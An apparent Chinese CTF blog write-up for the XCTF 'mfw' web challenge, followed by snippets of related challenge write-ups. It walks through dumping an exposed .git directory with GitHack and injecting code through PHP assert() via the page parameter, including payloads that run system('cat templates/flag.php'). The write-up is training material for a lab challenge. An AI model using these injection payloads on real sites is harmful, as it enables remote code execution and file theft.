攻防世界26-mfw-CTFWeb
攻防世界26-mfw-CTFWeb
本文参考:
WEB安全-常见源码泄露 | wh1te (lddp.github.io)
首先瞎点发现,可能存在git源码泄露问题,尝试.git访问,源码中也有按时page=flag,但访问无果
[My PHP Website](http://xx:xxx/.git)
下载工具githack,可以把整个.git 备份的文件下载下
在目录下打开cmd python GitHack.py http://61.147.171.105:64160/.git/
下载源码,审计源码(templates下的flag文件的flag被注释了)
1 |
|
assert函数:
assert ( mixed $assertion [, string $description ] ) : bool
assert() 会检查指定的 assertion 并在结果为 FALSE 时采取适当的行动
or操作符:如果assert(abc)结果为false,PHP 会继续执行or右侧的de。
比如输入的包含..,那就是flase==false,就是true,不执行后面的代码
代码中过滤了..
看看assert上能不能操作
尝试一下
?page=aa') or phpinfo();//
也就是
1 | assert("strpos('templates/aa') or phpinfo();//.php', '..') === false") |
我们从源码得知,肯定没有aa这个文件,因此它会执行or函数后面的phpinfo,再把//后面的.php注释掉
http://61.147.171.105:64160/?page=aa') or system('cat templates/flag.php');//
可以执行,看源码
1 | payload: ?page=').system("cat templates/flag.php");// |
这样好像也行,时链式执行
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 Matriy's blog!
wechat- alipay
相关推荐
2024-12-11
PHP2-CTFWeb进阶wp-攻防世界13
CTFWeb进阶wp-攻防世界-PHP2用了御剑和dirsearch扫描了一下发现什么也没扫描到,其它人好像有扫描到的,看了大佬的wp说有index.phps,去查了下。 phps 文件就是 php 的源代码文件,可以当作一个知识点记住,直接访问/index.phps,得到源码 123456789101112131415<?phpif("admin"===$_GET[id]) { echo("<p>not allowed!</p>"); exit();}$_GET[id] = urldecode($_GET[id]);if($_GET[id] == "admin"){ echo "<p>Access granted!</p>"; echo "<p>Key: xxxxxxx </p>";}?>Can you anthenticate to...
2024-12-09
CTF-Web入门wp-XCTF-(1-12)
CTF-Web入门wp-XCTF-(1-12)本人也是刚入门ctf-web系列,写一点wp 另外提供两个学习ctf的网站Hello CTF (hello-ctf.com)和Web 简介 - CTF Wiki (ctf-wiki.org) 入门题目地址:攻防世界 (xctf.org.cn) view_sourceF12查看Flag get_post使用HackBar get提交1...
2024-12-31
baby_web-Web-攻防世界14
baby_web-CTFWeb进阶wp-攻防世界14页面显示1.php,可以先访问下源码和index.php,发现内容一致,再查看下cookie和header,看一下有没有藏flag,发现没。 dirsearch一下,发现访问index.php会重定向到1.php。抓包看一下 查得flag
2024-11-09
攻防世界15-baby_web-Web
baby_web-CTFWeb进阶wp-攻防世界15描述:云平台报表中心收集了设备管理基础服务的数据,但是数据被删除了,只有一处留下了入侵者的痕迹。 直接看云平台报表中心 有个id=1,http://61.147.171.105:53702/index.php?id=1 改成2,3,aaa都没有变化,尝试爆破一下(感觉做多了无非就这几种方式) 改成下面那样开始爆破 找到flag
2024-11-09
攻防世界16-unserialize3-Web
攻防世界16-unserialize3-CTFWeb进阶根据题意,很明显是反序列化,反序列化的知识可以自己查,PHP 反序列化基础 - Hello CTF (hello-ctf.com)也行 123456class xctf{public $flag = '111';public function __wakeup(){ exit('bad requests');}?code= 以下是ctf中常用的方法: 1234567891011__wakeup() //------ 执行unserialize()时,先会调用这个函数__sleep() //------- 执行serialize()时,先会调用这个函数__destruct() //---- 对象被销毁时触发__call() //-------- 在对象上下文中调用不可访问的方法时触发__callStatic() //-- 在静态上下文中调用不可访问的方法时触发__get() //---------...
2024-11-09
攻防世界18-Web_php_include-Web
攻防世界18-Web_php_include-CTFWeb进阶看名字可能是文件包含的题 文件包含知识点:文件包含 - Hello CTF (hello-ctf.com)和文件包含漏洞全面详解-CSDN博客 123456789<?phpshow_source(__FILE__);echo $_GET['hello'];$page=$_GET['page'];while (strstr($page, "php://")) { $page=str_replace("php://", "", $page);}include($page);?> 解法1:小试牛刀: 代码审计一下发现,php://会被删除掉,看一下能不能用其他的伪协议 data://text/plain,...
评论
